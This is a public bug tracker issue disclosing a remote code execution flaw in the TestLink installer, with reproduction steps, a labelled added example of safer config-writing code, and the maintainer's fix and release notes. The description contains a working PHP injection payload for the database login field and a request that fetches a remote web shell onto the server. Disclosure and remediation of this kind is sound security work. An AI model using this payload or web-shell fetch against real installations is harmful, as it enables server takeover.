Mantis Bugtracker          
testlink.org

View Issue Details

ID: 0008209
Project: TestLink
Category: Security - General
View Status: public
Date Submitted: 2018-02-23 05:47
Last Update: 2018-04-14 09:04
Reporter: Manish Tanwar
Assigned To: fman
Priority: urgent
Severity: major
Reproducibility: always
Status: closed
Resolution: fixed
Platform:
OS:
OS Version:
Product Version: 1.9.16 (2016 Q4)
Fixed in Version: 1.9.17 (2018 Q1)
Summary: 0008209: Remote Code Execution

Description:
Hello,

During a code audit (versions 1.9.14 and 1.9.17) I came to know about a Remote Code Execution security issue.
This issue is on the script installation page (install/installNewDB.php).
Once script installation has been done, a user can again perform re-installation by navigating to the "/install/" directory. The script will ask for MySQL credentials, and if the user provides credentials of a MySQL server which is attacker controlled and listening for remote connections, the attacker just needs to specify the remote MySQL server IP, the root user's username and password, and needs to specify the PHP code "box');file_put_contents($_GET[1],file_get_contents($_GET[2]));//" in the "TestLink DB login" field (or in the HTTP POST parameter tl_loginname).
Once the script establishes a successful connection to the root user account of the remote MySQL server, it will create a MySQL user with the name "box');file_put_contents($_GET[1],file_get_contents($_GET[2]));//" and will write this username into the config_db.inc.php file.
After that the attacker just needs to access the config file config_db.inc.php with the following GET method HTTP parameters:
testlink/config_db.inc.php?1=shell.php&2=http://remote_server/php_web_shell.txt
It will dump a PHP web shell in the base directory with the name shell.php.
Steps To Reproduce:
-> Navigate to the "/install" directory.
-> Follow the instructions on the installation page until we get the web page in which we have to specify the MySQL server credentials.
-> Specify the remote MySQL server IP, root user account username and password in the Database Host, Database admin login and password fields respectively.
-> Specify the below-mentioned PHP code in the "Testlink db login" input field and any password in the "TestLink DB password" input field.
   box');file_put_contents($_GET[1],file_get_contents($_GET[2]));//
-> Click the "Process Testlink Setup" button and observe the response.
-> Open the "config_db.inc.php" file in a text editor and observe that the file contains "define('DB_USER', 'box');file_put_contents($_GET[1],file_get_contents($_GET[2]));//');", which is PHP code injection.
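The root cause the report describes is an installer that interpolates a user-supplied database login straight into a PHP source file between single quotes, so a quote in the login terminates the string literal and whatever follows is executed when the config file is loaded. The following is an added example, not TestLink's installer code and not the fix in the linked commit: a hypothetical config writer (function names writeDbConfig, renderDbConfig, isSafeDbLogin and the $params array are assumptions) that rejects logins outside a MySQL-identifier allowlist and, as a second layer, emits every value with var_export() so it is always a correctly escaped PHP literal.

```php
<?php
// Added example (not TestLink's code): writing config_db.inc.php so that a
// user-supplied DB login can never break out of the PHP string literal.
// writeDbConfig / renderDbConfig / isSafeDbLogin are hypothetical names.

// First layer: only accept plausible MySQL user names. MySQL caps user names
// at 32 characters; restricting to [A-Za-z0-9_.-] also rules out quotes,
// parentheses and semicolons, so the injected value quoted in the report
// is refused before anything is written to disk.
function isSafeDbLogin(string $login): bool
{
    return (bool) preg_match('/^[A-Za-z0-9_.-]{1,32}$/', $login);
}

// Second layer: var_export() produces a quoted and escaped PHP literal for
// each key and value, unlike string interpolation into "define('DB_USER', '$x')".
function renderDbConfig(array $params): string
{
    $lines = ['<?php', '// generated by the installer; do not edit by hand'];
    foreach (['DB_TYPE', 'DB_HOST', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
        $lines[] = sprintf(
            'define(%s, %s);',
            var_export($key, true),
            var_export((string) ($params[$key] ?? ''), true)
        );
    }
    return implode("\n", $lines) . "\n";
}

function writeDbConfig(string $path, array $params): void
{
    if (!isSafeDbLogin((string) ($params['DB_USER'] ?? ''))) {
        throw new InvalidArgumentException('DB login contains characters that are not allowed');
    }
    // Write to a temp file and rename so a half-written config is never loaded,
    // and keep the file unreadable to other local users (it holds the DB password).
    $tmp = $path . '.tmp';
    if (file_put_contents($tmp, renderDbConfig($params), LOCK_EX) === false) {
        throw new RuntimeException("cannot write $tmp");
    }
    chmod($tmp, 0640);
    rename($tmp, $path);
}

// Constructed sample input: the login string from the report must be rejected,
// a normal login must be written as an escaped literal.
$target = sys_get_temp_dir() . '/config_db.inc.php';
$base   = ['DB_TYPE' => 'mysql', 'DB_HOST' => 'localhost', 'DB_NAME' => 'testlink', 'DB_PASS' => 'example-pass'];

$bad = $base + ['DB_USER' => "box');file_put_contents(\$_GET[1],file_get_contents(\$_GET[2]));//"];
try {
    writeDbConfig($target, $bad);
    echo "unexpected: injected login was accepted\n";
} catch (InvalidArgumentException $e) {
    echo 'rejected: ' . $e->getMessage() . "\n";
}

$good = $base + ['DB_USER' => 'testlink_app'];
writeDbConfig($target, $good);
echo file_get_contents($target);
// The generated file contains: define('DB_USER', 'testlink_app');
```

The allowlist is the check that actually stops this class of bug; var_export() is defence in depth for the case where a later change loosens the allowlist. Neither addresses the other condition the report relies on, namely that "/install/" remains reachable after setup, so an installer that has completed should refuse to run again (for example by checking for the existing config file) and the directory should be removed or access-restricted once installation is done.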
Tags: No tags attached.
Database (MySQL,Postgres,etc): MySQL
Browser:
PHP Version:
TestCaseID:
QA Team - Task Workflow Status: READY FOR TESTING
Attached Files: testlink POC.png (171,492 bytes) 2018-02-23 05:47

- Relationships

- Notes
(0027229)
fman (administrator)
2018-02-24 09:31

Thanks, going to check
(0027235)
fman (administrator)
2018-02-24 16:22

please get latest code from github, retest and provide feedback
(0027236)
fman (administrator)
2018-02-24 16:24

https://github.com/TestLinkOpenSourceTRMS/testlink-code/commit/9696012eecbafb0aa21cc346234512c29b474679
(0027240)
Manish Tanwar (reporter)
2018-02-24 17:58

Hello,

I have checked the patch applied; it seems fixed.
In case I get any bypass, I will register an issue ticket.

I want to know how to get CVE ID for this security issue, if you can help me, please let me know.
Happy and Safe Coding.

Thank You
Manish
(0027241)
fman (administrator)
2018-02-24 18:01

can not help with CVE, never done
(0027242)
Manish Tanwar (reporter)
2018-02-24 18:02

That's fine, I will check with someone else :)
So are you going to mention my name in next release for security bug fix?
(0027295)
fman (administrator)
2018-04-14 09:04

release 1.9.17

- Issue History
Date Modified Username Field Change
2018-02-23 05:47 Manish Tanwar New Issue
2018-02-23 05:47 Manish Tanwar File Added: testlink POC.png
2018-02-24 09:31 fman Note Added: 0027229
2018-02-24 16:22 fman Note Added: 0027235
2018-02-24 16:24 fman QA Team - Task Workflow Status => READY FOR TESTING
2018-02-24 16:24 fman Note Added: 0027236
2018-02-24 16:24 fman Status new => resolved
2018-02-24 16:24 fman Fixed in Version => 1.9.17 (2018 Q1)
2018-02-24 16:24 fman Resolution open => fixed
2018-02-24 16:24 fman Assigned To => fman
2018-02-24 17:58 Manish Tanwar Note Added: 0027240
2018-02-24 18:01 fman Note Added: 0027241
2018-02-24 18:01 Manish Tanwar Note View State: 0027240: private
2018-02-24 18:02 Manish Tanwar Note Added: 0027242
2018-02-24 18:03 Manish Tanwar Note View State: 0027242: private
2018-02-24 18:40 Manish Tanwar Note View State: 0027240: public
2018-02-24 18:40 Manish Tanwar Note View State: 0027242: public
2018-02-25 13:42 fman View Status private => public
2018-04-14 09:04 fman Note Added: 0027295
2018-04-14 09:04 fman Status resolved => closed


